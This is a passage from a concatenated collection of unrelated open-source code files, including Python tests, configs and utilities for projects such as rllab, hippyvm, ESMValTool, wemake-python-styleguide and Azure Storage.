except BootstrapError:
logger.warning("No bootstrap information found for host '{}'".format(hostname))
return
logger.info(json.dumps(host_data, indent=4))
if save:
host = Host(**host_data)
host.save()
|
rllab/envs/mujoco/hill/walker2d_hill_env.py | RussellM2020/maml_gps | 1,838 | 12697234 | import numpy as np
from rllab.envs.mujoco.hill.hill_env import HillEnv
from rllab.envs.mujoco.walker2d_env import Walker2DEnv
from rllab.misc.overrides import overrides
import rllab.envs.mujoco.hill.terrain as terrain
from rllab.spaces import Box
class Walker2DHillEnv(HillEnv):
MODEL_CLASS = Walker2DEnv
@overrides
def _mod_hfield(self, hfield):
# clear a flat patch for the robot to start off from
return terrain.clear_patch(hfield, Box(np.array([-2.0, -2.0]), np.array([-0.5, -0.5]))) |
tests/python/twitter/common/contextutil/test_pushd.py | zhouyijiaren/commons | 1,143 | 12697248 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import os
from twitter.common.contextutil import pushd, temporary_dir
def test_simple_pushd():
pre_cwd = os.getcwd()
with temporary_dir() as tempdir:
with pushd(tempdir) as path:
assert path == tempdir
assert os.getcwd() == os.path.realpath(tempdir)
assert os.getcwd() == pre_cwd
assert os.getcwd() == pre_cwd
def test_nested_pushd():
pre_cwd = os.getcwd()
with temporary_dir() as tempdir1:
with pushd(tempdir1) as path1:
assert os.getcwd() == os.path.realpath(tempdir1)
with temporary_dir(root_dir=tempdir1) as tempdir2:
with pushd(tempdir2) as path2:
assert os.getcwd() == os.path.realpath(tempdir2)
assert os.getcwd() == os.path.realpath(tempdir1)
assert os.getcwd() == os.path.realpath(tempdir1)
assert os.getcwd() == pre_cwd
assert os.getcwd() == pre_cwd
|
examples/inprocess_qtconsole.py | KDAB/qtconsole | 329 | 12697269 | """An example of embedding a RichJupyterWidget with an in-process kernel.
We recommend using a kernel in a separate process as the normal option - see
embed_qtconsole.py for more information. In-process kernels are not well
supported.
To run this example:
python3 inprocess_qtconsole.py
"""
from qtpy import QtWidgets
from qtconsole.rich_jupyter_widget import RichJupyterWidget
from qtconsole.inprocess import QtInProcessKernelManager
def show():
global ipython_widget # Prevent from being garbage collected
# Create an in-process kernel
kernel_manager = QtInProcessKernelManager()
kernel_manager.start_kernel(show_banner=False)
kernel = kernel_manager.kernel
kernel.gui = 'qt4'
kernel_client = kernel_manager.client()
kernel_client.start_channels()
ipython_widget = RichJupyterWidget()
ipython_widget.kernel_manager = kernel_manager
ipython_widget.kernel_client = kernel_client
ipython_widget.show()
if __name__ == "__main__":
app = QtWidgets.QApplication([])
show()
app.exec_()
|
lexos/receivers/tokenizer_receiver.py | WheatonCS/Lexos | 107 | 12697271 | <reponame>WheatonCS/Lexos
"""This is the receiver for the tokenizer model."""
from typing import NamedTuple, Optional
from lexos.receivers.base_receiver import BaseReceiver
class TokenizerOption(NamedTuple):
"""The typed tuple to hold tokenizer front end option."""
start: Optional[int]
length: Optional[int]
search: Optional[str]
sort_column: Optional[int]
sort_method: Optional[bool]
csv_documents_as_rows: Optional[bool]
class TokenizerReceiver(BaseReceiver):
"""Get the tokenizer table orientation from front end."""
def __init__(self):
"""Initialize the class."""
super().__init__()
def options_from_front_end(self) -> TokenizerOption:
"""Get the tokenizer orientation from front end.
:return: a TokenizerTableOrientation object that holds the orientation.
"""
# This exception is here because when header is requested, values
# above related to data table drawing are not passed in.
try:
start = int(self._front_end_data["tokenizer_table_page_number"])
search = self._front_end_data["tokenizer_table_search_input"]
length = int(self._front_end_data["tokenizer_table_row_count"])
sort_method = bool(self._front_end_data[
"tokenizer_table_sort_mode"] == "Ascending")
sort_column = int(self._front_end_data[
"tokenizer_table_selected_column"])
csv_documents_as_rows = bool(self._front_end_data[
"csv_orientation"] == "Documents as Rows" if
"csv_orientation" in self._front_end_data else True)
except KeyError:
start = None
search = None
length = None
sort_method = None
sort_column = None
csv_documents_as_rows = None
# Pack everything and returns it as a NamedTuple.
return TokenizerOption(
start=start,
length=length,
search=search,
sort_column=sort_column,
sort_method=sort_method,
csv_documents_as_rows=csv_documents_as_rows
)
|
testing/test_standard.py | jweinraub/hippyvm | 289 | 12697284 | from testing.test_interpreter import BaseTestInterpreter
class TestStandardModule(BaseTestInterpreter):
def test_escapeshellarg(self):
output = self.run('''
echo escapeshellarg("xyz");
echo escapeshellarg('$X');
echo escapeshellarg("'");
echo escapeshellarg("x'y\\"z");
echo escapeshellarg("\\\\");
''')
assert self.unwrap(output[0]) == "'xyz'"
assert self.unwrap(output[1]) == "'$X'"
assert self.unwrap(output[2]) == "''\\'''"
assert self.unwrap(output[3]) == "'x'\\''y\"z'"
assert self.unwrap(output[4]) == "'\\'"
def test_shell_exec(self):
output = self.run('''
echo shell_exec('doesnotexist');
echo shell_exec('echo 0');
''')
assert output[0] == self.space.w_Null
assert self.space.str_w(output[1]) == "0\n"
def test_exec(self):
output = self.run('''
echo exec('doesnotexist');
echo exec('echo a && echo b');
''')
assert output[0] == self.space.wrap('')
assert self.space.str_w(output[1]) == "b"
def test_exec_error(self):
with self.warnings([
'Warning: exec(): Cannot execute a blank command']):
output = self.run('''
echo exec('');
echo exec(123);
''')
assert output == [self.space.w_False, self.space.wrap('')]
def test_exec_2(self):
output = self.run('''
$arr = array('foo');
echo exec('echo a && echo b', $arr);
echo $arr;
''')
assert map(self.space.str_w, output[1].as_list_w()) == ['foo', 'a', 'b']
|
corehq/apps/hqwebapp/tests/test_custom_login_page.py | dimagilg/commcare-hq | 471 | 12697333 | from django.test import SimpleTestCase, override_settings
from corehq.apps.hqwebapp.login_utils import get_custom_login_page
class TestCustomLogin(SimpleTestCase):
@override_settings(CUSTOM_LANDING_TEMPLATE=None)
def test_nothing_configured(self):
self.assertEqual(None, get_custom_login_page('example.com'))
@override_settings(CUSTOM_LANDING_TEMPLATE='custom/login.html')
def test_string_configured(self):
self.assertEqual('custom/login.html', get_custom_login_page('example.com'))
@override_settings(CUSTOM_LANDING_TEMPLATE={'example.com': 'custom/login.html'})
def test_dict_match(self):
self.assertEqual('custom/login.html', get_custom_login_page('example.com'))
@override_settings(CUSTOM_LANDING_TEMPLATE={'example.com': 'custom/login.html'})
def test_dict_mismatch(self):
self.assertEqual(None, get_custom_login_page('commcarehq.org'))
@override_settings(CUSTOM_LANDING_TEMPLATE={'example.com': 'custom/login.html',
'default': 'normal/login.html'})
def test_dict_default(self):
self.assertEqual('custom/login.html', get_custom_login_page('example.com'))
self.assertEqual('normal/login.html', get_custom_login_page('commcarehq.org'))
|
cape_privacy/coordinator/auth/api_token_test.py | vismaya-Kalaiselvan/cape-python | 144 | 12697348 | from cape_privacy.coordinator.auth.api_token import create_api_token
def test_api_token():
token_id = "imatokenid"
secret = "<KEY>"
token = create_api_token(token_id, secret)
assert token.token_id == token_id
assert token.secret == bytes(secret, "utf-8")
assert token.version == 1
|
tkinter/popup-menu-close/main.py | whitmans-max/python-examples | 140 | 12697366 | import tkinter as tk
def hello():
print("hello!")
def popup(event):
menu.post(event.x_root, event.y_root)
menu.focus()
def popup_close(event):
menu.unpost()
root = tk.Tk()
# frame
frame = tk.Frame(root, width=512, height=512)
frame.pack()
# popup menu
menu = tk.Menu(root, tearoff=0)
menu.add_command(label="Undo", command=hello)
menu.add_command(label="Redo", command=hello)
# events
frame.bind("<Button-3>", popup)
frame.bind("<Button-1>", popup_close)
menu.bind("<Escape>", popup_close)
root.mainloop()
|
DQM/CSCMonitorModule/python/test/csc_hlt_dqm_sourceclient-live.py | ckamtsikis/cmssw | 852 | 12697370 | import FWCore.ParameterSet.Config as cms
process = cms.Process("CSC HLT DQM")
#-------------------------------------------------
# DQM Module Configuration
#-------------------------------------------------
process.load("DQM.CSCMonitorModule.csc_hlt_dqm_sourceclient_cfi")
#----------------------------
# Event Source
#-----------------------------
process.load("DQM.Integration.test.inputsource_live_cfi")
#process.EventStreamHttpReader.consumerName = 'CSC HLT DQM Consumer'
#process.EventStreamHttpReader.sourceURL = "http://localhost:50082/urn:xdaq-application:lid=29"
#----------------------------
# DQM Environment
#-----------------------------
process.load("DQMServices.Core.DQM_cfg")
process.load("DQMServices.Components.DQMEnvironment_cfi")
#----------------------------
# DQM Playback Environment
#-----------------------------
process.load("DQM.Integration.test.environment_playback_cfi")
process.dqmEnv.subSystemFolder = "CSC"
process.DQM.collectorHost = 'pccmsdqm02.cern.ch'
#process.DQM.collectorHost = 'localhost'
process.dqmSaver.dirName = '.'
#--------------------------
# Message Logger
#--------------------------
MessageLogger = cms.Service("MessageLogger",
suppressInfo = cms.untracked.vstring('source'),
suppressDebug = cms.untracked.vstring('source'),
suppressWarning = cms.untracked.vstring('source'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(False)
),
detailedInfo = cms.untracked.PSet(
threshold = cms.untracked.string('INFO')
),
critical = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR')
),
debug = cms.untracked.PSet(
threshold = cms.untracked.string('DEBUG')
),
debugModules = cms.untracked.vstring('CSCHLTMonitormodule'),
destinations = cms.untracked.vstring(
# 'debug',
# 'detailedInfo',
# 'critical',
# 'cout'
)
)
#--------------------------
# Sequences
#--------------------------
process.p = cms.Path(process.dqmCSCClient+process.dqmEnv+process.dqmSaver)
|
samples/client/wordnik-api/python/wordnik/models/AudioFile.py | OneSpan/swagger-codegen | 133 | 12697378 | #!/usr/bin/env python
"""
Copyright 2012 Wordnik, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class AudioFile:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'attributionUrl': 'str',
'commentCount': 'int',
'voteCount': 'int',
'fileUrl': 'str',
'audioType': 'str',
'id': 'long',
'duration': 'float',
'attributionText': 'str',
'createdBy': 'str',
'description': 'str',
'createdAt': 'datetime',
'voteWeightedAverage': 'float',
'voteAverage': 'float',
'word': 'str'
}
self.attributionUrl = None # str
self.commentCount = None # int
self.voteCount = None # int
self.fileUrl = None # str
self.audioType = None # str
self.id = None # long
self.duration = None # float
self.attributionText = None # str
self.createdBy = None # str
self.description = None # str
self.createdAt = None # datetime
self.voteWeightedAverage = None # float
self.voteAverage = None # float
self.word = None # str
|
db_migrate_manager.py | masonsxu/red-flask | 161 | 12697393 | # -*- coding: utf-8 -*-
# @ Time : 2021/4/6 14:46
# @ Author : Redtree
# @ File : db_manager
# @ Desc : 单独将flask_migrate部分功能移出,不与flask_app本地IDE工具调试冲突。
from __init__ import manager
manager.run()
'''
在工程根目录下,运行
python db_migrate_manager.py db init
python db_migrate_manager.py db migrate
python db_migrate_manager.py db upgrade
python db_migrate_manager.py db --help
''' |
esmvaltool/cmorizers/obs/osi_common.py | cffbots/ESMValTool | 148 | 12697418 | <reponame>cffbots/ESMValTool<filename>esmvaltool/cmorizers/obs/osi_common.py
"""Common functionalities for OSI-450 dataset cmorization."""
import logging
import os
import glob
from datetime import datetime, timedelta
from calendar import monthrange, isleap
import numpy as np
import iris
import iris.exceptions
from iris.cube import Cube, CubeList
from iris.coords import AuxCoord
from iris.coord_categorisation import add_day_of_year
from esmvalcore.preprocessor import monthly_statistics
from .utilities import (set_global_atts, convert_timeunits, fix_var_metadata,
save_variable)
logger = logging.getLogger(__name__)
class OSICmorizer():
"""Cmorizer for OSI-450 datasets."""
def __init__(self, in_dir, out_dir, cfg, hemisphere):
self.in_dir = in_dir
self.out_dir = out_dir
self.cfg = cfg
self.hemisphere = hemisphere
self.min_days = self.cfg['custom'].get('min_days', 50)
def cmorize(self):
"""Cmorize OSI-450 or OSI-409 dataset."""
logger.info(
"Starting cmorization for Tier%s OBS files: %s",
self.cfg['attributes']['tier'],
self.cfg['attributes']['dataset_id'])
logger.info("Input data from: %s", self.in_dir)
logger.info("Output will be written to: %s", self.out_dir)
# run the cmorization
first_run = True
for var, vals in self.cfg['variables'].items():
var_info = {}
for mip in vals['mip']:
var_info[mip] = self.cfg['cmor_table'].get_variable(mip, var)
file_pattern = '{0}_{1}_{2}_*.nc'.format(
vals['raw'], self.hemisphere, vals['grid']
)
for year in os.listdir(self.in_dir):
year = int(year)
logger.info(
"CMORizing var %s for year %s", var, year
)
raw_info = {
'name': vals['raw'],
'file': os.path.join(
self.in_dir, str(year), '??', file_pattern)
}
self._extract_variable(var_info, raw_info, year, vals['mip'])
if first_run:
sample_file = glob.glob(os.path.join(
self.in_dir, str(year), '01', file_pattern))[0]
cube = iris.load_cube(
sample_file,
iris.Constraint(
# pylint: disable=cell-var-from-loop
cube_func=lambda c: c.var_name == raw_info['name'])
)
self._create_areacello(cube)
first_run = False
def _extract_variable(self, var_infos, raw_info, year, mips):
"""Extract to all vars."""
cubes = iris.load(
raw_info['file'],
iris.Constraint(cube_func=lambda c: c.var_name == raw_info['name'])
)
tracking_ids = self._unify_attributes(cubes)
cube = cubes.concatenate_cube()
del cubes
if tracking_ids:
cube.attributes['tracking_ids'] = tracking_ids
cube.coord('projection_x_coordinate').var_name = 'x'
cube.coord('projection_y_coordinate').var_name = 'y'
lon_coord = cube.coord('longitude')
lon_coord.points[lon_coord.points < 0] += 360
source_cube = cube
attrs = self.cfg['attributes']
for mip in mips:
var_info = var_infos[mip]
attrs['mip'] = mip
if var_info.frequency == 'mon':
cube = monthly_statistics(source_cube)
cube = self._fill_months(cube)
elif var_info.frequency == 'day':
cube = self._fill_days(source_cube, year)
if not cube:
continue
logger.debug(cube)
fix_var_metadata(cube, var_info)
convert_timeunits(cube, year)
set_global_atts(cube, attrs)
self._try_remove_coord(cube, 'year')
self._try_remove_coord(cube, 'day_of_year')
self._try_remove_coord(cube, 'month_number')
self._try_remove_coord(cube, 'day_of_month')
save_variable(cube, var_info.short_name, self.out_dir, attrs)
return cube
@staticmethod
def _try_remove_coord(cube, coord):
try:
cube.remove_coord(coord)
except iris.exceptions.CoordinateNotFoundError:
pass
@staticmethod
def _fill_months(cube):
if cube.coord('time').shape[0] == 12:
return cube
cubes = CubeList(cube.slices_over('time'))
model_cube = cubes[0].copy()
for month in range(1, 13):
month_constraint = iris.Constraint(
# pylint: disable=cell-var-from-loop
time=lambda cell: cell.point.month == month
)
if cubes.extract(month_constraint):
continue
cubes.append(
OSICmorizer._create_nan_cube(model_cube, month, month=True))
cube = cubes.merge_cube()
return cube
def _fill_days(self, cube, year):
if cube.coord('time').shape[0] < self.min_days:
logger.warning(
'Only %s days available. Skip generation of daily files',
cube.coord('time').shape[0]
)
return None
total_days = 366 if isleap(year) else 365
if cube.coord('time').shape[0] < total_days:
cubes = OSICmorizer._add_nan_timesteps(cube, total_days)
cube = cubes.merge_cube()
cube.remove_coord('day_of_year')
del cubes
return cube
@staticmethod
def _add_nan_timesteps(cube, total_days):
add_day_of_year(cube, 'time')
cubes = CubeList(cube.slices_over('time'))
model_cube = cubes[0].copy()
model_cube.remove_coord('day_of_year')
for day_of_year in range(total_days):
day_constraint = iris.Constraint(
day_of_year=day_of_year + 1
)
if cubes.extract(day_constraint):
continue
nan_cube = OSICmorizer._create_nan_cube(
model_cube, day_of_year, month=False
)
add_day_of_year(nan_cube, 'time')
cubes.append(nan_cube)
del model_cube
return cubes
@staticmethod
def _create_nan_cube(model_cube, num, month):
nan_cube = model_cube.copy(
np.ma.masked_all(model_cube.shape, dtype=model_cube.dtype)
)
time_coord = nan_cube.coord('time')
nan_cube.remove_coord(time_coord)
date = time_coord.cell(0).point
if month:
date = datetime(date.year, num, date.day)
bounds = (
datetime(date.year, num, 1),
datetime(date.year, num, monthrange(date.year, num)[1])
)
else:
date = datetime(date.year, 1, 1, 12) + timedelta(days=num)
bounds = (
datetime(date.year, 1, 1) + timedelta(days=num),
datetime(date.year, 1, 1, 23, 59) + timedelta(days=num)
)
date = time_coord.units.date2num(date)
bounds = (
time_coord.units.date2num(bounds[0]),
time_coord.units.date2num(bounds[1]),
)
nan_cube.add_aux_coord(AuxCoord(
[date],
standard_name=time_coord.standard_name,
var_name=time_coord.var_name,
long_name=time_coord.long_name,
units=time_coord.units,
attributes=time_coord.attributes,
bounds=[bounds],
))
return nan_cube
@staticmethod
def _unify_attributes(cubes):
tracking_ids = []
for cube in cubes:
# OSI-409 and OSI-450 do not have the same attributes
try:
tracking_ids.append(cube.attributes['tracking_id'])
except KeyError:
pass
to_remove = [
'time_coverage_start', 'time_coverage_end',
'history', 'tracking_id', 'start_date', 'stop_date',
]
for attr in to_remove:
try:
del cube.attributes[attr]
except KeyError:
pass
return tracking_ids
def _create_areacello(self, sample_cube):
if not self.cfg['custom'].get('create_areacello', False):
return
var_info = self.cfg['cmor_table'].get_variable('fx', 'areacello')
lat_coord = sample_cube.coord('latitude')
self.cfg['attributes']['mip'] = 'fx'
cube = Cube(
np.full(
lat_coord.shape,
self.cfg['custom']['grid_cell_size'],
np.float32),
standard_name=var_info.standard_name,
long_name=var_info.long_name,
var_name=var_info.short_name,
units='m2',
)
cube.add_aux_coord(lat_coord, (0, 1))
cube.add_aux_coord(sample_cube.coord('longitude'), (0, 1))
cube.add_dim_coord(sample_cube.coord('projection_y_coordinate'), 0)
cube.add_dim_coord(sample_cube.coord('projection_x_coordinate'), 1)
cube.coord('projection_x_coordinate').var_name = 'x'
cube.coord('projection_y_coordinate').var_name = 'y'
fix_var_metadata(cube, var_info)
set_global_atts(cube, self.cfg['attributes'])
save_variable(
cube, var_info.short_name, self.out_dir,
self.cfg['attributes'], zlib=True
)
|
tests/test_base_os.py | mattlemmone/elasticsearch-docker | 866 | 12697467 | <reponame>mattlemmone/elasticsearch-docker
from .fixtures import elasticsearch
def test_base_os(host):
assert host.system_info.distribution == 'centos'
assert host.system_info.release == '7'
def test_no_core_files_exist_in_root(host):
core_file_check_cmdline = 'ls -l /core*'
assert host.run(core_file_check_cmdline).exit_status != 0
def test_all_elasticsearch_files_are_gid_0(host):
check_for_files_with_gid_0_command = (
"cd /usr/share && "
"find ./elasticsearch ! -gid 0 | "
"egrep '.*'"
)
assert host.run(check_for_files_with_gid_0_command).exit_status != 0
|
wemake_python_styleguide/visitors/tokenize/comments.py | cdhiraj40/wemake-python-styleguide | 1,931 | 12697480 | r"""
Disallows to use incorrect magic comments.
That's how a basic ``comment`` type token looks like:
.. code:: python
TokenInfo(
type=57 (COMMENT),
string='# noqa: WPS100',
start=(1, 4),
end=(1, 16),
line="u'' # noqa: WPS100\n",
)
All comments have the same type.
"""
import re
import tokenize
from token import ENDMARKER
from typing import ClassVar
from typing.re import Pattern
from typing_extensions import Final, final
from wemake_python_styleguide.constants import MAX_NO_COVER_COMMENTS, STDIN
from wemake_python_styleguide.logic.system import is_executable_file, is_windows
from wemake_python_styleguide.logic.tokens.constants import NEWLINES
from wemake_python_styleguide.logic.tokens.strings import get_comment_text
from wemake_python_styleguide.violations.best_practices import (
EmptyCommentViolation,
ForbiddenInlineIgnoreViolation,
OveruseOfNoCoverCommentViolation,
OveruseOfNoqaCommentViolation,
ShebangViolation,
WrongDocCommentViolation,
WrongMagicCommentViolation,
)
from wemake_python_styleguide.visitors.base import BaseTokenVisitor
EMPTY_STRING: Final = ''
SENTINEL_TOKEN: Final = tokenize.TokenInfo(
type=ENDMARKER,
string=EMPTY_STRING,
start=(0, 0),
end=(0, 0),
line=EMPTY_STRING,
)
@final
class WrongCommentVisitor(BaseTokenVisitor):
"""Checks comment tokens."""
_no_cover: ClassVar[Pattern] = re.compile(r'^pragma:\s+no\s+cover')
_type_check: ClassVar[Pattern] = re.compile(
r'^type:\s?([\w\d\[\]\'\"\.]+)$',
)
def __init__(self, *args, **kwargs) -> None:
"""Initializes a counter."""
super().__init__(*args, **kwargs)
self._no_cover_count = 0
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Performs comment checks."""
self._check_typed_ast(token)
self._check_empty_doc_comment(token)
self._check_cover_comments(token)
def _check_typed_ast(self, token: tokenize.TokenInfo) -> None:
comment_text = get_comment_text(token)
match = self._type_check.match(comment_text)
if not match:
return
declared_type = match.groups()[0].strip()
if not declared_type.startswith('ignore'):
self.add_violation(
WrongMagicCommentViolation(token, text=comment_text),
)
def _check_empty_doc_comment(self, token: tokenize.TokenInfo) -> None:
if get_comment_text(token) == ':':
self.add_violation(WrongDocCommentViolation(token))
def _check_cover_comments(self, token: tokenize.TokenInfo) -> None:
comment_text = get_comment_text(token)
match = self._no_cover.match(comment_text)
if not match:
return
self._no_cover_count += 1
def _post_visit(self) -> None:
if self._no_cover_count > MAX_NO_COVER_COMMENTS:
self.add_violation(
OveruseOfNoCoverCommentViolation(
text=str(self._no_cover_count),
baseline=MAX_NO_COVER_COMMENTS,
),
)
@final
class EmptyCommentVisitor(BaseTokenVisitor):
"""Checks empty comment tokens."""
def __init__(self, *args, **kwargs) -> None:
"""Initializes fields to track empty comments."""
super().__init__(*args, **kwargs)
self._line_num = -1
self._prev_comment_line_num = -1
self._prev_non_empty = -1
self._in_same_block = True
self._block_alerted = False
self._reserved_token = SENTINEL_TOKEN
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Performs comment checks."""
self._check_empty_comment(token)
def _check_empty_comment(self, token: tokenize.TokenInfo) -> None:
self._line_num = token.start[0]
self._check_same_block(token)
# Triggering reserved token to be added
if not self._in_same_block and self._has_reserved_token():
self.add_violation(EmptyCommentViolation(self._reserved_token))
self._block_alerted = True
self._reserved_token = SENTINEL_TOKEN
if get_comment_text(token) == EMPTY_STRING:
if not self._in_same_block:
# Stand alone empty comment or first empty comment in a block
self.add_violation(EmptyCommentViolation(token))
self._block_alerted = True
self._in_same_block = True
to_reserve = (
# Empty comment right after non-empty, block not yet alerted
self._is_consecutive(self._prev_non_empty) and
self._in_same_block and
not self._block_alerted
)
if to_reserve:
self._reserved_token = token
else:
self._prev_non_empty = self._line_num
if self._in_same_block:
self._reserved_token = SENTINEL_TOKEN
self._prev_comment_line_num = token.start[0]
def _check_same_block(self, token: tokenize.TokenInfo) -> None:
self._in_same_block = (
self._is_consecutive(self._prev_comment_line_num) and
token.line.lstrip()[0] == '#' # is inline comment
)
if not self._in_same_block:
self._block_alerted = False
def _is_consecutive(self, prev_line_num: int) -> bool:
return (self._line_num - prev_line_num == 1)
def _has_reserved_token(self) -> bool:
return (self._reserved_token != SENTINEL_TOKEN)
def _post_visit(self) -> None:
if self._has_reserved_token() and not self._block_alerted:
self.add_violation(EmptyCommentViolation(self._reserved_token))
@final
class ShebangVisitor(BaseTokenVisitor):
"""
Checks the first shebang in the file.
Code is insipired by https://github.com/xuhdev/flake8-executable
"""
_shebang: ClassVar[Pattern] = re.compile(r'(\s*)#!')
_python_executable: ClassVar[str] = 'python'
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Checks if there is an executable mismatch."""
if not self._is_first_comment(token):
return # this is a regular comment, not a shebang
is_shebang = self._is_valid_shebang_line(token)
self._check_executable_mismatch(token, is_shebang=is_shebang)
if is_shebang:
self._check_valid_shebang(token)
def _check_executable_mismatch(
self,
token: tokenize.TokenInfo,
*,
is_shebang: bool,
) -> None:
if is_windows() or self.filename == STDIN:
# Windows does not have this concept of "executable" file.
# The same for STDIN inputs.
return
is_executable = is_executable_file(self.filename)
if is_executable and not is_shebang:
self.add_violation(
ShebangViolation(
text='file is executable but no shebang is present',
),
)
elif not is_executable and is_shebang:
self.add_violation(
ShebangViolation(
text='shebang is present but the file is not executable',
),
)
def _check_valid_shebang(self, token: tokenize.TokenInfo) -> None:
if self._python_executable not in token.line:
self.add_violation(
ShebangViolation(
text='shebang is present but does not contain `python`',
),
)
if token.start[1] != 0:
self.add_violation(
ShebangViolation(
text='there is a whitespace before shebang',
),
)
if token.start[0] != 1:
self.add_violation(
ShebangViolation(
text='there are blank or comment lines before shebang',
),
)
def _is_first_comment(self, token: tokenize.TokenInfo) -> bool:
all_tokens = iter(self.file_tokens)
current_token = next(all_tokens)
while True:
if current_token == token:
return True
elif current_token.exact_type not in NEWLINES:
break
current_token = next(all_tokens)
return False
def _is_valid_shebang_line(self, token: tokenize.TokenInfo) -> bool:
return self._shebang.match(token.line) is not None
@final
class NoqaVisitor(BaseTokenVisitor):
"""Checks noqa comment tokens."""
_noqa_check: ClassVar[Pattern] = re.compile(r'^(noqa:?)($|[A-Z\d\,\s]+)')
def __init__(self, *args, **kwargs) -> None:
"""Initializes a counter."""
super().__init__(*args, **kwargs)
self._noqa_count = 0
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Performs comment checks."""
self._check_noqa(token)
def _check_noqa(self, token: tokenize.TokenInfo) -> None:
comment_text = get_comment_text(token)
match = self._noqa_check.match(comment_text)
if not match:
return
self._noqa_count += 1
excludes = match.groups()[1].strip()
prefix = match.groups()[0].strip()
if not excludes or prefix[-1] != ':':
# We cannot pass the actual line here,
# since it will be ignored due to `# noqa` comment:
self.add_violation(WrongMagicCommentViolation(text=comment_text))
return
self._check_forbidden_noqa(excludes)
def _check_forbidden_noqa(self, noqa_excludes) -> None:
excludes_list = [ex.strip() for ex in noqa_excludes.split(',')]
forbidden_noqa = EMPTY_STRING.join(self.options.forbidden_inline_ignore)
for noqa_code in forbidden_noqa.split(','):
noqa_code = noqa_code.strip()
if noqa_code in excludes_list:
self.add_violation(
ForbiddenInlineIgnoreViolation(text=str(noqa_excludes)),
)
return
if not noqa_code.isalpha():
continue
for excluded in excludes_list:
if re.fullmatch(r'{0}($|\d+)'.format(noqa_code), excluded):
self.add_violation(
ForbiddenInlineIgnoreViolation(text=str(noqa_excludes)),
)
return
def _post_visit(self) -> None:
if self._noqa_count > self.options.max_noqa_comments:
self.add_violation(
OveruseOfNoqaCommentViolation(text=str(self._noqa_count)),
)
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py | vincenttran-msft/azure-sdk-for-python | 2,728 | 12697490 | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
from datetime import datetime, timedelta
from azure.core.exceptions import HttpResponseError
from azure.storage.blob import (
BlobServiceClient,
BlobType,
BlobBlock,
BlobSasPermissions,
ContainerEncryptionScope,
generate_blob_sas,
generate_account_sas, ResourceTypes, AccountSasPermissions, generate_container_sas, ContainerSasPermissions
)
from settings.testcase import BlobPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
# The encryption scope are pre-created using management plane tool ArmClient.
# So we can directly use the scope in the test.
TEST_ENCRYPTION_KEY_SCOPE = "antjoscope1"
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
default_encryption_scope="containerscope")
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = {
"default_encryption_scope": "containerscope",
"prevent_encryption_scope_override": True
}
TEST_SAS_ENCRYPTION_SCOPE = "testscope1"
TEST_SAS_ENCRYPTION_SCOPE_2 = "testscope2"
# ------------------------------------------------------------------------------
class StorageCPKNTest(StorageTestCase):
def _setup(self, bsc):
self.config = bsc._config
self.container_name = self.get_resource_name('utcontainer')
# prep some test data so that they can be used in upload tests
self.byte_data = self.get_random_bytes(64 * 1024)
if self.is_live:
try:
bsc.create_container(self.container_name)
except:
pass
def _teardown(self, bsc):
if self.is_live:
try:
bsc.delete_container(self.container_name)
except:
pass
return super(StorageCPKNTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name("cpk")
def _create_block_blob(self, bsc, blob_name=None, data=None, encryption_scope=None, max_concurrency=1, overwrite=False):
blob_name = blob_name if blob_name else self._get_blob_reference()
blob_client = bsc.get_blob_client(self.container_name, blob_name)
data = data if data else b''
resp = blob_client.upload_blob(data, encryption_scope=encryption_scope, max_concurrency=max_concurrency, overwrite=overwrite)
return blob_client, resp
def _create_append_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_append_blob(encryption_scope=encryption_scope)
return blob
def _create_page_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_page_blob(1024 * 1024, encryption_scope=encryption_scope)
return blob
# -- Test cases for APIs supporting CPK ----------------------------------------------
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_and_put_block_list(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc)
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('2', b'BBB', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('3', b'CCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
